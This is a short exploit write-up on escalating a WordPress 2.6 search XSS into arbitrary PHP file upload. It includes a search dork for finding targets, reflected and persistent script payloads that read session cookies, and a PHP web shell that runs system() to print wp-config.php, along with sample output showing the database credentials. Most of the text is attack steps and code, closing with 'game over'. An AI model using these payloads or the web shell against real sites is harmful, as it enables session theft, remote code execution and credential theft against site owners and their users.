Escalating Wordpress 2.6 search XSS to Arbitrary File Upload

dork: "is proudly powered by WordPress"

XSS (Reflected) :

http://[host]/[wordpress_path]/index.php?s=<script>alert(document.cookie)</script>

XSS (Persistent) :

Once a session is stolen two persistent XSS vectors become possible with either Editer or Admin account level access:

Write a New Post->post_title:
<script>alert(document.cookie)</script>

Read any post->comment:
<script>alert(document.cookie)</script>

Arbitrary File Upload :

If we have admin and wp-content/uploads is chmod 777 to enable file uploads we can upload PHP files:

Write Post -> add media (from toolbar), upload our a.php file:

$ cat a.php
<?php

// display database connection settings
system("cat ../../../../wp-config.php");
system("type ../../../../wp-config.php");

?>

Arbitrary File Upload :

The file is uploaded to the following path where 2008 is year and 08 is month at the time of upload:

http://[host]/[wordpress_path]/wp-content/uploads/2008/08/a.php

$ cat ../../../../wp-config.php
<?php
// ** MySQL settings ** //
define('DB_NAME', 'database');    // The name of the database
define('DB_USER', 'username');     // Your MySQL username
define('DB_PASSWORD', 'password'); // ...and password
define('DB_HOST', 'localhost');    // 99% chance you won't need to change this value
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');

// .......

?>

game over

Reference

OWASP: Cross Site Scripting

OWASP: Unrestricted File Upload